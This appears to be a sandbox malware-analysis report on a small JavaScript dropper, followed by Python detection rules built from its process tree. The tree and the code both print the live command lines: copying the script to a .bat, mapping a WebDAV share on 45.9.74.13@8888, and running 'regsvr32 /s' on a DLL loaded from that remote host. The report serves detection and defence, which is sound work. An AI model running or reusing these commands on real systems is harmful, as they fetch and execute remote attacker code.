Analysis
max time kernel: 119s
max time network: 122s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 09/07/2024, 03:41
Static task: static1
Behavioral task: behavioral1 (sample 983219531850416586.js, resource win7-20240705-en)
Behavioral task: behavioral2 (sample 983219531850416586.js, resource win10v2004-20240704-en)
General
Target: 983219531850416586.js
Size: 5KB
MD5: 6954aee6f19b67ee5ac67d962166c496
SHA1: 1728c0a5a2abce12ebae8f6740e0e9d07fc5be1b
SHA256: 5868cba1db313aa8470cb32b98a3fb5991001ec4c62a3928ff2126ea828cb9a2
SHA512: 2380532022cfc86fb8d6347fc2bd319329c71999dca9b8f0e782cad95e3ecfe8340c69d875492bf2ad9b021f9d0eb7ea458fd01984e9e587592d399172d2fcad
SSDEEP: 96:ZeqLBoCKc5dFpM/QGFpFnWPJ3R1NZwJYm8I9OXGFtyXps9cxGsG+22cxcJTcqcYy:ZeeoC/zpcQ+pFnKd3wJY/uXyZKcxc+d+
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs): attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  PID 2496, process regsvr32.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description                        pid   process      procid_target   occurrences
  PID 2708 wrote to memory of 2664   2708  wscript.exe  30              3
  PID 2664 wrote to memory of 2508   2664  cmd.exe      32              3
  PID 2664 wrote to memory of 2496   2664  cmd.exe      33              5
Processes
1. C:\Windows\system32\wscript.exe
   wscript.exe C:\Users\Admin\AppData\Local\Temp\983219531850416586.js
   PID 2708 | Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\983219531850416586.js" "C:\Users\Admin\\avlicd.bat" && "C:\Users\Admin\\avlicd.bat"
      PID 2664 | Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\net.exe
         net use \\45.9.74.13@8888\DavWWWRoot\
         PID 2508
      3. C:\Windows\system32\regsvr32.exe
         regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\39.dll
         PID 2496 | Suspicious behavior: CmdExeWriteProcessMemorySpam
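The process tree above shows the full chain: wscript.exe runs the .js, cmd.exe copies that same file to a .bat and executes it, net.exe maps a WebDAV share using the WebClient UNC form \\host@port\DavWWWRoot, and regsvr32 /s then loads 39.dll straight from that share. The Python below is an added detection example and is not part of the sandbox report. It runs three rules over constructed process-creation events: the first four events copy the PIDs and command lines from the tree above, the fifth is a constructed benign control (a local DLL registered by an installer) that must not fire. The ProcEvent record layout, the rule names and the control event are assumptions of the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as recorded by the sandbox / EDR


# Constructed process-creation events. The first four mirror the report's
# process tree (PIDs and command lines copied from it); the parent PID 1 for
# wscript.exe is a placeholder. The last event is a constructed benign control.
EVENTS = [
    ProcEvent(2708, 1, "C:\\Windows\\system32\\wscript.exe",
              "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\983219531850416586.js"),
    ProcEvent(2664, 2708, "C:\\Windows\\System32\\cmd.exe",
              '"C:\\Windows\\System32\\cmd.exe" /k copy '
              '"C:\\Users\\Admin\\AppData\\Local\\Temp\\983219531850416586.js" '
              '"C:\\Users\\Admin\\\\avlicd.bat" && "C:\\Users\\Admin\\\\avlicd.bat"'),
    ProcEvent(2508, 2664, "C:\\Windows\\system32\\net.exe",
              "net use \\\\45.9.74.13@8888\\DavWWWRoot\\"),
    ProcEvent(2496, 2664, "C:\\Windows\\system32\\regsvr32.exe",
              "regsvr32 /s \\\\45.9.74.13@8888\\DavWWWRoot\\39.dll"),
    ProcEvent(3000, 2900, "C:\\Windows\\system32\\regsvr32.exe",
              'regsvr32 /s "C:\\Program Files\\Vendor\\lib.dll"'),
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# \\host@port\DavWWWRoot is the UNC form the Windows WebClient service maps to a
# WebDAV server; group 1 captures the host[@port] part.
WEBDAV_UNC = re.compile(r"\\\\([^\s\\]+)\\DavWWWRoot", re.IGNORECASE)
# Any UNC path argument (\\host\share\...), WebDAV or SMB.
ANY_UNC = re.compile(r"\\\\[^\s\\]+\\[^\s]+", re.IGNORECASE)
# "copy <something>.js <something>.bat": the script copied to a batch file.
JS_TO_BAT_COPY = re.compile(r'\bcopy\b[^&]*\.js"?\s+"?[^&]*\.bat', re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of an image path, e.g. 'cmd.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule, detail) tuples for events matching the three rules.

    detail is the WebDAV host[@port] where one was parsed, else None.
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""

        # Rule 1: a script host spawns cmd.exe that copies a .js to a .bat
        if name == "cmd.exe" and parent_name in SCRIPT_HOSTS \
                and JS_TO_BAT_COPY.search(e.cmdline):
            hits.append((e.pid, "script_copied_to_bat", None))

        # Rule 2: net.exe maps a WebDAV share via the DavWWWRoot UNC form
        if name == "net.exe":
            m = WEBDAV_UNC.search(e.cmdline)
            if m:
                hits.append((e.pid, "webdav_share_mounted", m.group(1)))

        # Rule 3: regsvr32 given a UNC path, i.e. a DLL loaded from a remote share
        if name == "regsvr32.exe" and ANY_UNC.search(e.cmdline):
            m = WEBDAV_UNC.search(e.cmdline)
            hits.append((e.pid, "regsvr32_remote_dll", m.group(1) if m else None))
    return hits


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"PID {pid}: {rule}" + (f" ({detail})" if detail else ""))
```

Rule 3 is the one worth alerting on by itself: regsvr32 registering a DLL from any UNC path is rare in normal administration, and the DavWWWRoot form only resolves when the WebClient service is running, which is another thing to check on a host that produced this tree.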
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 5KB (hashes match the submitted sample)
  MD5: 6954aee6f19b67ee5ac67d962166c496
  SHA1: 1728c0a5a2abce12ebae8f6740e0e9d07fc5be1b
  SHA256: 5868cba1db313aa8470cb32b98a3fb5991001ec4c62a3928ff2126ea828cb9a2
  SHA512: 2380532022cfc86fb8d6347fc2bd319329c71999dca9b8f0e782cad95e3ecfe8340c69d875492bf2ad9b021f9d0eb7ea458fd01984e9e587592d399172d2fcad